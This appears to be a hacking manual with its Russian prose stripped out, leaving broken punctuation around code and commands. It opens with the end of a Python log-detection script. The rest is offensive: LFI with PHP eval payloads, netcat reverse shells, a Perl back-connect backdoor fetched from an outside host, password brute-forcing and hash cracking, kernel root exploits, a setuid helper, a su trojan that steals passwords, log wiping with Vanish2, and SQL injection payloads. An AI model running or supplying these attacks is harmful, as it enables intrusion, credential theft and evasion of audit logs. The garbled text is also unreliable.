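    return rec


def classify(rec):
    """Names of the rules a single parsed record triggers."""
    hits = []
    path, ua = rec["path"], rec["ua"]
    if CHAR_PROBE_RE.search(path):
        hits.append("blind_sqli_char")
    elif BOOL_PROBE_RE.search(path):
        hits.append("blind_sqli_bool")
    if PROC_RE.search(path):
        hits.append("proc_lfi")
    if PHP_TAG_RE.search(ua) or PHP_TAG_RE.search(path):
        hits.append("php_in_request")
    return hits


def scan(lines):
    """Run every rule over every parseable line; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in classify(rec):
            findings.append({"ip": rec["ip"], "rule": rule, "path": rec["path"]})
    return findings


def suspicious_ips(findings, min_char_probes=3):
    """Hosts worth escalating: a run of character probes (the >100, >80, >90,
    >85, >86 bisection leaves several near-identical requests) or a /proc
    traversal carrying PHP code. The threshold is a choice, not a standard."""
    per_ip = Counter((f["ip"], f["rule"]) for f in findings)
    flagged = set()
    for (ip, rule), n in per_ip.items():
        if rule == "blind_sqli_char" and n >= min_char_probes:
            flagged.add(ip)
        if rule == "proc_lfi" and per_ip[(ip, "php_in_request")] > 0:
            flagged.add(ip)
    return sorted(flagged)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["rule"], f["path"][:60])
    print("escalate:", suspicious_ips(scan(SAMPLE_LOG.splitlines())))
```

Feed real access_log lines to scan(); the per-host count in suspicious_ips() is what separates a single odd request from an extraction run.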

Apache
access_log error_log? ,
, . /proc Apache.
:
 id :
/proc/%{PID}/fd/%{FD_ID}

%{PID} ( , /
proc/self/status), %{FD_ID} ( 2
7 Apache).
:
http://site.com/index.php?page=../../../../../../../../proc/self/status

, %{PID} 1228, :
curl "http://site.com/index.php?page=../../../../../../../../proc/
1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

 , id , self:
curl "http://site.com/index.php?page=../../../../../../../../proc/
self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

, self ,
id . (
Apache)
.


,
. ,
Secteam
.

- , - . .
. *nix .
e-mail :
1. - .
2. - (, ),
, php-, .
3. wwwrun@localhost,
wwwrun , http- (
www-data, nobody, www, apache, wwwdata . .).
/var/mail ( /var/spool/mail)
, http-.
curl:
curl "http://site.com/index.php?page=../../../../../../../../var/mail/
wwwrun&cmd=phpinfo();"

, , ( -
).

09

CRLF-

CRLF- , , ,
. ,
:
[00:20:33] <Admin> !
[00:20:40] <Lapochka> , Admin!

(, Alex)
(%0a) :
, !%0a[00:20:51] <Admin> , Lapochka!

:
[00:20:33]
[00:20:40]
[00:20:49]
[00:20:51]

<Admin> !
<Lapochka> , Admin!
<Alex> , !
<Admin> , Lapochka!

(, FlyLinkDC++)
%0a Ctrl+Enter ( Codehunter aka Born
Dragon).

III
?












0A.
0B.
0C.
0D.
0E.
0F.
10.
11.
12.
13. IT-

0A


(). ? ,

(root).
, ,
0D -. , -,
-, 05.
, ,
netcat ( nc).
Unix ( Linux). , -e,
( ),
DVL .
netcat :
nc -l -n -v -p 25

-p (25),
.
. -v (verbose )
-vv (very verbose ).
netcat :
nc -e /bin/sh <IP> 25

(back connect)
. ,
/bin/sh. IP- 127.0.0.1,
:
nc -e /bin/sh 127.0.0.1 25

, (connect), ,

. , netcat
,
nc+-e+/bin/sh+127.0.0.1+25

, . , ,
netcat .
, Damn Vulnerable Linux , . 0.1.
( ).

. 0.1. netcat


nc -l -n -vv -p 25

Enter
listening on [any] 25 ...

, netcat 25.

su nobody

Enter. root nobody. , ,

,
nobody. netcat:
nc -e /bin/sh 127.0.0.1 25

Enter . :
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]

, netcat (
) netcat ( ).
id , ,
nobody, root. uname -a .
- exit
Ctrl+C.
, - netcat -e?
, ; -
(back connect shell), Google, back connect
shell download. ,
( ),
, . , -
mypage .
backconnect.txt. ( ,
!) , , wget :
wget -O /tmp/bc.pl http://mypage.narod.ru/backconnect.txt

-O ( O , *nix-, Windows,
).
/tmp bc.pl.
curl ftp. curl :
curl -o /tmp/bc.pl http://mypage.narod.ru/backconnect.txt

,
:
chmod 755 /tmp/bc.pl

, /tmp/bc.pl : IP- , ,
. :
/tmp/bc.pl 127.0.0.1 25

- Perl, . http://
otaku-studios.com/showthread.php/72978-Perl-Backconnect . :
#!/usr/bin/perl
use IO::Socket;
$system
= '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable
to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable
to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-");
system($system);
#EOF

Kate, ,
( ) /tmp bc.pl.
, .
, , su nobody.
, .
:
chmod 755 /tmp/bc.pl

, , (
Enter):
nc -l -n -vv -p 25

:
/tmp/bc.pl 127.0.0.1 25

. 0.2. IHS Back-Connect

(. 0.2).
, - (uname -a, id pwd) .
:
unset HISTFILE
unset SAVEHIST

.
.bash_history.
,
. .
, , ,
(backdoor , , ). ,
, ,
. ,
.
/tmp sticky-,
drwxrwxrwt .

. - ( root) ,
drwxrwxrwx. find:
find / -type d -perm -0777 -print > /tmp/.file &


/tmp/.file.

0B

02
/etc/passwd, ().
,
. ( ) (brute force ).
, .
( ), , , 13% , .
/etc/passwd
( )
(
)
user1:user1
user2:user2
...
userN:userN

Windows,
Brutus AET 2 (http://www.hoobie.net/brutus).
, - PuTTY ( Windows). PuTTY
. ,
,
, PuTTY (. 0B.1). Linux
nc.
21 (FTP ), 110 (POP3
), 23 (telnet), 22 (SSH SSH). , Brutus SSH,
BruteSSH Linux Back Track 4.
PuTTY SSH,
IP- (Host name (or IP-address))
www.site.com, .

. 0B.1. PuTTY

(22). (Connection type) SSH. Open () . login as:, ,


SSH .
, . 127.0.0.1. ,
, .
21, 25, 110,
Port, Connection type Raw.
Open. ,
- , ,
.
Brutus (. 0B.2). ,
, (Type).
, 21 (FTP). FTP.
root , - ,
, , root FTP . , , . Pass Mode (
) Combo List Combo File
:.

Brutus example-combo.txt. , Target


. Start. , (, , ,
) Positive Authentication Results
( ).

. 0B.2. Brutus

, .
(Morris and Grampp).
, 20 .
200. 200
.
( ). Brutus
words.txt.
-. (, , , , ). (,
, , , . .).

Pass Mode Word List, User File Pass File ,


, .
Brutus , FTP- Windows.
TYPSoft FTP Server. http://soft.mydiv.net/
win/files-TYPSoft-FTP-Server.html.
, ftpserv.
exe. , SetupFTP, (Language russian), .
SetupUsers ()
midnight 12345 (. 0B.3).

. 0B.3. TYPSoft FTP Server

Brutus combo.txt,
example-combo.txt,
(midnight:12345). Brutus,
. 0B.4, Start.
FTP ( ).
Main FTP- , Brutus
(. 0B.5).
. , TYPSoft FTP Server users.ini
md5- ,
, .

. 0B.4. combo.txt. !

. 0B.5. TYPSoft FTP Server

FTP.
, FTP-. ,
, Total Commander
, . Total Commander
( )
. . ,
(deface ) .
index.html index.php index.old,
index.html ,
- ,
. , ,
, ,
, .
FTP PuTTY. localhost, 21
(Connection type) Raw.
FTP- , (. 0B.6).

. 0B.6. FTP- PuTTY

22,
SSH ( ).
PuTTY ( Windows), ssh ( Linux).
, /etc/passwd /bin/bash /bin/sh, - /sbin/nologin /
bin/false ( ,
). ,
. 21 (FTP)
, 110 (POP3 ),
Brutus , POP3
, FTP.

Brutus -.
Use Proxy Define -,
(. 0B.7). - , .

. 0B.7. - Brutus

BruteSSH,
SSH. Back Track 4 root toor.
:
/etc/init.d/networking start

, startx .
,
. , . toor.
/pentest/passwords/brutessh aa.txt.
BackTrackPrivilege EscalationPasswordAttacsOnlineAttacsBruteSSH
BruteSSH.
. :
./brutessh.py -h 127.0.0.1 -u root -d aa.txt

, root,
. 0B.8.
Back Track 4 9
, , Hydra Medusa. , SSH, .
, ,
Xhydra (HydraGTK) . Hydra

. 0B.8. BruteSSH

. 0B.9. Medusa

, .
Windows.
Medusa . 0B.9.
.

0C

*nix-
Unix
John The Ripper (www.openwall.com). .
? -, (,
PC-Linux) /etc/passwd,
. -, , ,
/etc/shadow. -,
/etc/shadow , , .
-,
( )
, root.
JTR (John The Ripper -)
Unix- , Windows.
Back Track 4, Windows
.
unshadow /etc/passwd /etc/shadow.
/etc/passwd, .
:
unshadow <passwd-file> <shadow-file> > <output-file>

:
root:JhAraBYwfjR3.:0:0:root:/:/bin/bash
mac:GGCfyAEua5zUc:11001:11001:service-myserver.com POP:/home/mac:/bin/sh
pincher:ySb4B8nseVzEo:11002:11002:Pitch:/home/pincher:/bin/sh
luis:O04IBHwrKKVEA:11003:11003:thisserver.com POP:/home/luis:/bin/sh

passwd, ( Windows john john-mmx)


john passwd

, Ctrl+C. john.rec ( ).
10 .
,
john --restore

,
john --show passwd

john.pot,
.
, , .
john single (). .
,
/etc/passwd: ,
, . ,
, ,
ed, s, . .
john :
john --single users.txt

users.txt . pincher pitched.


. : password.lst.
:
john --wordlist=password.lst users.txt

, , --rules:
john --rules --wordlist=password.lst users.txt

, . ,
, . , , .
richard, luis. ,

:
john --incremental:alnum users.txt

alnum ( ).
( --incremental) all (--incremental:all),

, .
(digits),
(alpha).
, . mac
titanic.
.
(-) ( ).
--users=[-]LOGIN|UID[,..]


.
--groups=[-]GID[,..]

( ) .
--shells=[-]SHELL[,..]

[
()].
Unix (
DES). 2 salt (). , .
, , Solaris
( SunOS).
( Linux FreeBSD)
DES , , .
FreeBSD Linux MD5.
$1. JTR FreeBSD MD5
hash. Linux . , BlowFish $2.
John The Ripper
.
,
(John ).
Ubuntu Linux (Back Track 4)
SHA-512, $6, John .
FreeBSD MD5
, . -
JTR (
3500 ),
. MD5 ,

15 ,
Unix- 8 .
JTR Unix-,
DES, ,
. , ,
-, John
,
. ,
, ,
8- , 4-,
.
*nix- JTR
MySQL, MS SQL, Oracle . . 40 .
? (
1520 ) .
.
, .
, . , Linux-
3 , , ,
.

LDAP-
LDAP *nix-. root
/etc/paaswd /etc/shadow, LDAP.
. *nix- base64.
ldap2pw John The Ripper (http://www.openwall.com/lists/john-users/2008/02/11/1).
, :
#!/usr/bin/perl -w
use strict;
use MIME::Base64;
while( <> && ! eof) {
    # need eof since we will hit eof on the other <>
    chomp;
    my( $uid, $passw, $cn, $dn);
    $cn = $uid = '';
    while( <> ) {
        # get an object
        chomp;
        last if /^\s*$/;
        # objects have blank lines between them
        if( /^cn: (.+)/ ) {
            $cn = $1;
        }
        elsif( /^dn: (.+)/ ) {
            $dn = $1;
        }
        elsif( /^userP\w+:: (.+)/) {
            $passw= substr( decode_base64($1), 7);
            # assuming {crypt}
        }
        elsif( /^uid: (.+)/) {
            $uid = $1;
        }
    }
    print "$uid\:$passw\:\:\:$cn\n" if defined $passw; # only output if object has password
}

root
ldap search, ldap2pw,
ldap.pw:
ldapsearch -D "<dn for root>" -w xxxxxx -b "<base dn for users>" ""
userpassword uid cn | ldap2pw > ldap.pw

ldap.pw John.

MD5-
, , Windows
MD5- MD5Inside, InsidePro (. 0C.1).
4
. , . ,
- . InsidePro
PasswordsPro, ,
.
MDCrack
(21 ), http://mdcrack.openwall.
net. .
( CUDA).
. MD5 (World Fastest MD5 Cracker)
BarsWF (http://3.14.by/ru/md5). GeForce GT220

. 0C.1. MD5Inside Inside Pro

153155 , 3538 .
183184 (. 0C.2).

. 0C.2. BarsWF

BarsWF , (,
http://hash.insidepro.com/index.php?lang=rus).


, :
barswf_cuda_x32 -h 1b0e9fd3086d9a159a1d6cb86f11b4ca -c 0aA~

.
Rainbow Tables ( )
MD5-, .
. .
, root. , , , .
ssh T su.
nobody,
.
expect, . expect (
), bruteforce.exp,
su.
(
&) , . ,

su.

0D

*nix- (root). - privilege escalation, privilege


elevation (, , ).
, () -
. Linux ,
(kernel) . ,
Linux (, Ubuntu, Fedora Red Hat)
.
Damn Vulnerable Linux.
exploit-db.com.
Milw0rm, ,
. Damn Vulnerable Linux /pentest/exploits/milw0rm Milw0rm,
2007 , .
( platforms), ( local remote), ,
( ports). exploit-db.
com , Milw0rm.
nobody ( su nobody), . 0D.1,
/tmp ( cd /tmp).
. uname -a . ,
Linux 2.6.20. ,
. Google Linux kernel 2.6 local root
exploit ( 2.6 root).
Linux kernel 2.6 Local Privilege Escalation.
exploit-db.com ,
, , ,
, .

. 0D.1. vmsplice qaaz

Linux kernel
2.6.17 2.6.24.1 vmsplice Local Root Exploit ( www.
exploit-db.com/exploits/5092/). 2008
qaaz. jessica_biel_naked_in_my_bed ( ) ,
. .c ,
. Kate /tmp ex.c, ,
,
:
wget -O /tmp/ex.c http://www.exploit-db.com/download/5092

.
. (kernel exploits)
-static, .
Linux C gcc (GNU C Compiler).
cc (C Compiler).
:
gcc -static -W -n -o ex ex.c

-o ( ex). (ex.c) . (. . 0D.1),


, (warning)
(error) . ( ./ex) , : $

#, . id ,
root (uid=0).
. !
,
Linux.
2.4.17 newlocal, kmod, uselib24;
2.4.18 brk, brk2, newlocal, kmod;
2.4.19 brk, brk2, newlocal, kmod;
2.4.20 ptrace, kmod, ptrace-kmod, brk, brk2;
2.4.21 brk, brk2, ptrace, ptrace-kmod;
2.4.22 brk, brk2, ptrace, ptrace-kmod;
2.4.22-10 loginx;
2.4.23 mremap_pte;
2.4.24 mremap_pte, uselib24;
2.4.25-1 uselib24;
2.4.27 uselib24;
2.6.2 mremap_pte, krad, h00lyshit;
2.6.5-2.6.8 krad, krad2, h00lyshit;
2.6.8-5 krad2, h00lyshit;
2.6.9 krad, krad2, h00lyshit;
2.6.9-34 r00t, h00lyshit;
2.6.10 krad, krad2, h00lyshit;
2.6.13-2.6.16 raptor, raptor2, h0llyshit, prctl;
2.6.17-2.6.24.1 vmsplice;
2.6-2.6.19 (32bit) ip_append_data() 0x82-CVE-2009-2698;
2.6.30 +/SELinux/RHEL5 Test Kernel Local Root Exploit 0day;
2.6.31 perf_counter (x64);
2.6.1-2.6.32-rc5 Pipe.c.
- - ( ),
root -,
.
SSH - .
, .
, , /bin/sh,
system ("chmod 4755 /tmp/hack");

root chmod 4755 suid ( 4) /tmp/hack .


hack.c :
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    char cmd[512];
    FILE *file;
    setuid(0);   /* the binary is set-uid root, so take the root uid/gid */
    setgid(0);
    file = fopen("/tmp/cmd", "r");
    if (file == NULL)
        return 1;
    if (fgets(cmd, sizeof cmd, file) != NULL)
        system(cmd);
    fclose(file);
    return 0;
}

/tmp/cmd ,
/tmp/hack suid, . /tmp /tmp/evil.

, , /tmp/
cmd. ? ,
root,
( do_brk).
, , ,
/tmp/cmd
iptables -t nat -nvL

, ,
iptables -F

.
iptables ( )
- PHP- suid,
root.
,
(0-day) ( ) ,
, .
. /bin/sh, . :
#!/bin/sh
alias "/bin/sh" "chmod 4755 /tmp/evil"

. /bin/sh root
chmod.
root
Back Track 4. (2.6.30),

, , root.
, . , - ?
, root?
,
. , .bash_history, ,
su (switch user), . su
, .
:
mkdir .elm

, .ssh ,
.
( ) .bashrc, :
PATH=$HOME/.elm:$PATH

.elm. , su
( ), su ,
/bin, . su.c,
FA-Q 1999 , http://www.
packetstormsecurity.org/trojans/index7.html.
:
/* su trojan ribbed by FA-Q
* werd to lwn for his help.
* mkdir .elm
* cc -o ~/.elm/su su.c
* edit .bash_profile or .bashrc
* add PATH=$HOME/.elm:$PATH
*/
#include <stdio.h>
#include <stdlib.h>
#define SU_PASS "/tmp/.rewt"
main (int argc, char *argv[])
{
char *key;
char buf[24];
FILE *fd;
key = (char *)getpass ("Password:");
fd = fopen(SU_PASS,"w");
fprintf(fd, "pass: %s\n", key);
fclose(fd);
printf ("su: incorrect password\n");
sprintf(buf, "rm %s", argv[0]);
system(buf);
exit (1);
}


cc -o ~/.elm/su su.c

, . ? /tmp/.rewt,
, , .
,
, su.
, su.
, /tmp/.rewt. , , , - .
. :
sprintf(buf, "rm %s", argv[0]);

:
sprintf(buf, "rm /home/user/.elm/%s", argv[0]);

rm su. (, DVL) su: incorrect password


, , : Sorry.
DVL , BackTrack 4
(. 0D.2).

. 0D.2. su

uri (home/uri).
su root /tmp.
, su
bash su - /home/uri/.elm,
. , , ,
. su : /bin/su. ,
, su, , (, /bin/su), .
echo $PATH
$PATH .
su ,
, .
, ,
. , http://www.spywaredb.com/remove-su-trojan-ribbed/
( ):
Su trojan ribbed . ,
. Su trojan ribbed , Spyware Doctor. Su trojan ribbed , su.c.txt.
.txt . , su.c.txt. (
, ),
su. , /tmp ,
. , ,
.
, ,
. Spyware Doctor ,
.
.
/etc/shadow ,
root? .
, ,
. libc
5.4.7. suid: ping, traceroute, rlogin ssh.

1. bash, bash.
2. :
export RESOLV_HOST_CONF=/etc/shadow

3. -
, asdf:
ping asdf

, /etc/
shadow. , root. DVL Linux. ,
. ping (traceroute, rlogin, ssh) ,
RESOLV_HOST_CONF, , -, ,
, /etc/shadow. ,
(asdf), , RESOLV_HOST_CONF.
rcb.c,
:
/* RCB Phraser therapy in '96
* Limits: Linux only, no binary files.
* little personal message to the world: F*CK CENSORSHIP!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void getjunk(const char *filetocat)
{ setenv("RESOLV_HOST_CONF",filetocat,1);
system("ping xy 1> /dev/null 2> phrasing");
unsetenv("RESOLV_HOST_CONF");
}
int main(int argc, char **argv)
{ char buffer[200];
char *gag;
FILE *devel;
if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
{ printf("RCB Phraser junked by THERAPY\n\n");
printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
exit(1);
}
getjunk(argv[1]);
gag=buffer;
gag+=10;
devel=fopen("phrasing","rb");
while(!feof(devel))
{ fgets(buffer,sizeof(buffer),devel);
if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24,"\n");
fputs(gag,stdout);
}
}
fclose(devel);
remove("phrasing");
return 0;
}


rcb /etc/shadow

/etc/shadow ,
.
Linux 2.6.7-rc3 (
, - )
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit, , /etc/passwd, ,
. 2004 ,
Marco Ivaldi,
http://www.exploit-db.com/exploits/718/

, root ?
, (
!), ,
, .
,
. , :
last login from xxx.com time:0:00 date:xx/xx/xx,

IP- ,
. ,
ssh localhost
. ,
:
last login from localhost

, .

0E


-, (log wiper).
-, () -.
, ,
. ,
. ,
,
(root ),
.
Apache,
/usr/local/apache/logs/access_log. (. 0E.1).

. 0E.1. access_log

Vanish2, Neo The Hacker.


:
http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz

WTMP, UTMP, lastlog, messages, secure, xferlog, maillog,


warn, mail, httpd.access_log, httpd.error_log.
messages, secure httpd.access_log. Vanish2
.
. ,
.
/tmp :
wget -O vanish2.tgz http://packetstormsecurity.org/UNIX/
penetration/log-wipers/vanish2.tgz

:
tar -xzvf vanish2.tgz

:
gcc vanish2.c -o vanish2

(Damn Vulnerable Linux) , , exit .


exit() exit(0). (. 0E.2):
vanish2 nobody localhost 127.0.0.1

. 0E.2. Vanish2

utmp , wtmp . ,
Vanish2 - , .
Vanish2,
. , , .
exit(0),
, , :
// exit(0);

access_log error_log .
, . 0E.3. access_log, ,
,
127.0.0.1. IP , . , , , .

. 0E.3. Vanish2

, Vanish2 .
hacker-pro, 10 .
-
http://packetstormsecurity.org/UNIX/penetration/log-wipers/

, root , ?

last. utmp wtmp,
ssh -T
( ). , ,
. PuTTY Windows , SSHTTY (Dont allocate a pseudo-terminal). .
- , , , , touch -t,
. :
touch -t [[CC]YY]MMDDhhmm[.ss] <file>

, MM , , , .
. ,
, , . ,
file.c 27 2009 23 35 22 ,
:
touch -t 200906272335.22 file.c

, .

0F

, , , .
,
root, .
, , , . , ( w who)
( last). ,
, last _.
( finger). /etc/passwd
/etc/shadow, . ,
, FTP, . PuTTY, ,
SessionLogging (Printable Output). putty.log ( , ).
cat
.
.
/etc/shadow,
( /etc/shadow.old shadow, ).
LDAP, /usr/local/openldap/backup LDAP . ,
, ,
base64. Perl,
0C, ,
John The Ripper.

.bash_history.

(root). , (
.sh . .).
,
, .
root
hack, hacking, hacker, intruder . . ,
check_intruder.sh ,
. , ,
, ,
.
/etc/hosts ssh/known_hosts,
, .
root .
root , root
,
ssh:
ssh root@other-host.net

10

,
. 3 (. 10.1).
. SQL-
, . XSS
.
, (
),
, .
,
(). : FTP,
PHP ,
(system(), passthru() shell_exec()), perl- python- . ,
-, .
-
,
.
,
(,
).
, root , .
, , ,
, .
, .

. 10.1.

11

(remote) , .
.
(). ,
.
, ( -),
ftp- ProFTPD.
1.3.1 1.3.2 rc 2, SQL-. ( )
ftp- ( 21),
:
USER myuser

myuser .
:
PASS password

password myuser. , FTP (


, , ).
% SQL-, users () ,
1:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
PASS 1

.
http://downloads.securityfocus.com/vulnerabilities/exploits/33722.pl

:
./exploit.pl ftp.example.com

ftp.example.com ( ftp FTP). ,


:
[*] Connected To ftp.example.com
[!] Please Choose A Command To Execute On ftp.example.com :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here =>

, 2005
: Linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit. ftp-
Linux.
,
. Sun
OpenSolaris (LiveCD). - ,
OpenSolaris,
DHCP- (
), jack
jack su
opensolaris. 2008 , Sun
.
,
.

12


. , , , . . (
, 2005). 100
(), , .
,
check.sh ( ),
-. , - -, r57shell, 99sh, void.ru,
PHP-, shell_exec,
base64_decode create_function.
/var/log/check.log, -
. , .
, shell_exec,
, - eval,
system passthru. , (cgitelnet, nfm . .).
#!/bin/bash
if [ $# -lt 1 ]; then
    echo "usage: $0 file_name";
    exit 0;
fi
RESULT=""
FILE=""
# PHP files: look for known web-shell names and the functions they rely on
for F in $( grep "\.php$" $1 ); do
    FIND=`echo $F | grep -c "\.php$"`
    if [ "$FIND" == "0" ]; then
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
    else
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
        F1="/usr/"$FILE
        if [ -f "$F1" ]; then
            RE=`grep -c r57shell "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
            fi
            RE=`grep -c gzinflate "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
            fi
            RE=`grep -c 99sh "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
                echo $FIND "$FILE"
            fi
            RE=`grep -c "\.void\.ru" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
                echo $FIND "$FILE"
            fi
            RE=`grep -c "shell_exec" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nshell_exec:FIND possible hack file "$F1
                echo $FIND "$FILE"
            fi
            RE=`grep -c "base64_decode" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nbase64_decode:FIND possible hack file "$F1
                echo $FIND "$FILE"
            fi
            RE=`grep -c "create_function" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\ncreate_function:FIND possible hack file "$F1
                echo $FIND "$FILE"
            fi
        fi
        FILE=""
    fi
done;
FILE=""
# .htaccess files: a handler that makes other extensions run as PHP
for F in $( grep "\.htaccess$" $1 ); do
    FIND=`echo $F | grep -c "\.htaccess$"`
    if [ "$FIND" == "0" ]; then
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
    else
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
        echo $FIND "$FILE"
        F1=$FILE
        if [ -f "$F1" ]; then
            RE=`grep -c "application/x-httpd-php" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
            fi
        fi
        FILE=""
    fi
done;
FILE=""
# index pages: spam text injected into a defaced page
for F in $( grep "index\.html$\|index\.php$\|index\.htm$" $1 ); do
    FIND=`echo $F | grep -c "index\."`
    if [ "$FIND" == "0" ]; then
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
    else
        if [ "$FILE" == "" ]; then
            FILE=$F
        else
            FILE=$FILE" "$F
        fi
        echo $FIND "$FILE"
        F1="/usr/"$FILE
        if [ -f "$F1" ]; then
            RE=`grep -i -c "viagra" "$F1" `
            if [ "$RE" != "0" ]; then
                RESULT=$RESULT"\nFIND possible hack file "$F1
            fi
        fi
        FILE=""
    fi
done;
if [ "$RESULT" != "" ]; then
    echo -e `date`$RESULT >> /var/log/check.log
    echo -e `date`$RESULT | mail -c sysadm@mysite.net -s "Red Alert! possible hack file on mysite.net" admin@mysite.net
else
    echo -e `date`" didn't find intruder." >> /var/log/check.log
fi

13


IT-

,
. ,
, . , , ,
,
. , .



, .
.
, , ,
(!).
1990- ,
()
. ( , )
,
( ABF),
(subsidiary) .

,
,
. ,
( ).
ABF ( , ,

) -
, .
. ,
.
(
), .
, .
.
3- LINC II. , , 1970-.
LINC II,

, ,
.
, LINC II,

LINC II , , , .
, ,
.
, :
. ,
,
.
.
, , - .
, , . .
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.

, , ,
, ,
. , ,
. UNISYSUNISYS,

. , UNISYS
UNIMAS ( , , )
, ! .
,
.
, ( )
, ,
, . ? , ,
,
.
?
,
, , ,
IT- ,
. .
.

ICQ
2007 , . ,
, ( ), . , , ,
. ,
.
: , ?
,
, . . ,
, ,
. ,
, , jimm.

, - . , jimm Java .
(

), Java
, jar-.
. -, jimm ,
ICQ. . , , jimm, .
: -,
; -,
; -, ( , ) ,
, , .
,
, , , . .
,
jimm
, , . , ,
,
- .
, , . ? :
ICQ-.
, .
, ,
.
, , ,
. .
, ,
. -
ICQ, : .
, , .
.
(, !)
ICQ (, , ). , ,
. .
,
, , 273 , ,
.

,
. , ,
, , , ,
, ! - ,
ICQ- . , , , .
, .
.
, , ? , , . .

,

,
,
.
, 2005 .
, ,
, Linux.
,
.
, , ,
/tmp, , , , . , /tmp
.
Windows, .
, ,
- IP-.
, , ,
- - Perl.
: , , .
- .
, ,
. , , -,
.
, -.

- , , .
,
, ,
.
, Google, .
, ,
-, . Google
, .
, /tmp ,
. , - ,
-,
. . , Linux Unix- ,
, , ,
.
, ?
,
, -, , .
- , ,
90-, .
, ,

-,
, . ,
, -
Google . - .
, ,
.
root , ( , suid).
Linux
2.6.x, 2.4.x (
). , , , Google
( linux kernel 2.4. local root exploit)
root, .

, ,
, , ,
- .
. ,
,
, ,
.
.
, , ,
,
- , .
, ,
, - .
, ,
. ,
.

*nix-

ls <dir>

.
dir

. .
pwd

.
cd <dir>

.
cat <file>

.
id

.
whoami

? .
uname -a

.
uptime

( ).
netstat

.
man <command>

*nix-.
<command> --help

.
users

.
who

, .
w

, .

ps


ps -Al

.
kill <PID>

<PID>.
finger <login>

.
last

.
last <login>

.
cp <file> <newlocation>

.
mv <file> <newlocation>

.
rm <file>

.
mkdir <dir>

.
rmdir <dir>

.
chmod xxx <file>

.
vi <file>

vi.
vim <file>

.
cc <file> -o <outfile>

C.
gcc <file> -o <outfile>

C GNU.
wget -O <outfile> <url>

.
curl -o <outfile> <url>

SQL-
show.php Cyphor

SQL- show.php.
Cyphor.
,
show.php , , , , .
.
.
, cyphor/admin/forum-create.php ,
. 2.1, include("check.php")
#.
. .

. 2.1. cyphor/admin/forum-create.php


http://localhost/webexploitation_package_02/cyphor/admin/forum-create.php

, . 2.2,
Create Forum.
SQL- id.
(. 2.3):
http://localhost/webexploitation_package_02/cyphor/show.php?fid=1&id=-10
union select 1,2,3,4,5,nick,password,8,id,10 from cyphor_users where id=1

cyphor_users id, nick password , id=1 ().

. 2.2. Cyphor

. 2.3. SQL- id show.php Cyphor

: ? MySQL information_schema tables columns.


:
union select 1,2,3,4,5,6,group_concat(table_name),8,9,10
from information_schema.tables.

SQL- fid
show.php. , (
,
).
, , fid
(, fid=1), id
. , - :
fid=-1 union select 1,2,3,4 from cyphor_users

(. 2.4).

. 2.4. SQL cyphor_4

, : cyphor_4. (
show.php) , , .
, msg_test.

'msg_test' ( ,
, ).
.
- ,
concat:
http://localhost/webexploitation_package_02/cyphor/show.php?fid=-1 union
select 1, concat(nick,0x3a,password),3,'msg_test' from cyphor_users

. 2.5.

. 2.5. SQL- d show.php

, ,
, .
.

Cyphor

Cyphor crypt (), .


,
8 , ,
1000 ( PHP
). - , ? , .
, (register.php),
random_password ( globals.php).
8- , , ,
.
, time(). ,
Unix- , 1 1970 . ,
cyphor_users
( signup_date). SQL-
, . 3.1.

. 3.1. , ( )

PHP,
, ,
( signup_date). register.php ,
signup_date + 1 (
). ,
signup_date, random_password.
( ,
). ,
( crack-pass.php), . 3.2.

. 3.2. crack-pass.php

crack-pass.php , .
